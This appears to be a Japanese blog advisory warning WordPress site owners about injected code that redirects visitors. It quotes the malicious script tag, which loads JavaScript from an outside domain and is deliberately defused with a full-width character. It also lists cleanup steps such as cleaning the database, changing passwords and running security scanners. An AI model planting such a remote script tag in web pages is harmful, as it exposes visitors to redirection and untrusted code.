【ご注意】WordPressの不正コード改ざん
2022/03/25
WordPressを狙った不正コードによる下記動画のような改ざんが横行しているようです。
下記内容のスクリプトが埋め込まれており、アクセスした人が別ページに飛ばされるといった類のもののようです。
<script type=’text/javascript’ src=’https://sdb.dancewithme.biz/db.js’></script>
※sは故意に全角に変えております
改ざんされた場合は下記の手順で修正してください。
データベース周り
まず、データベースのバックアップをし、データベースの中に入っている不正コードを削除します。
削除したデータをデータベースに戻し、データベースのパスワードも変更しておきましょう。
WordPressでのチェック
まずログインユーザーのパスワードを変更します。
その後、Wordfence Securityプラグインをインストールします。
チェック後異常箇所を変更します。
Sucuri Securityも使ってスクリプトのスキャンをかけておいたほうが良いでしょう。
皆様、ご注意ください。
関連記事
-
-
サイトに重大なエラーがありました。と出てきて顔面蒼白になる
WordPressを使っていると稀にこの事象に出くわします。 バックアップが運良 …
-
-
category.php内で現在のカテゴリを取得する
カテゴリの取得でハマったので忘備録しておきます。 いつもはget_the_cat …
-
-
WordPressの指定日時での部分表示
久しぶりにWordPressで少しハマったので忘備録です。 サイトの一部分だけ指 …
-
-
PHPのバージョン変更したことでエラーが出る
PHPバージョン7系のサーバーからPHPバージョン8系サーバーにサイト移管した時 …
-
-
ワードプレスのサイト引越し時に500エラー
毎度おなじみのワードプレス備忘録です。 表題の通り、よくある(よくあってほしくな …
-
-
ショートコードの出力結果が固定ページや投稿の上部に表示される
またもやWordPress覚書。もはやメモ帳代わり。 固定ページなどの途中でPH …
-
-
WordPressの検索欄が未入力で全件表示してしまう件
間違えて空欄で検索した時に全件表示・・・。 バグでもエラーでもないんですがなんか …
-
-
PHPでページの一部の文言だけを更新する方法
サイトのページの一部だけをブラウザから更新したい、だけどCMSとか入れるほどでも …
-
-
「パスワードは、記号を含むか、20 文字以上でなければなりません。」で苦しんだ話
ワードプレスのユーザーを追加する際、パスワードを設定するんですが、ここでつまづい …
-
-
WordPressでプラグイン無しサイトマップ
【WordPress】プラグイン無しでサイトマップを追加する方法。 コードのみで …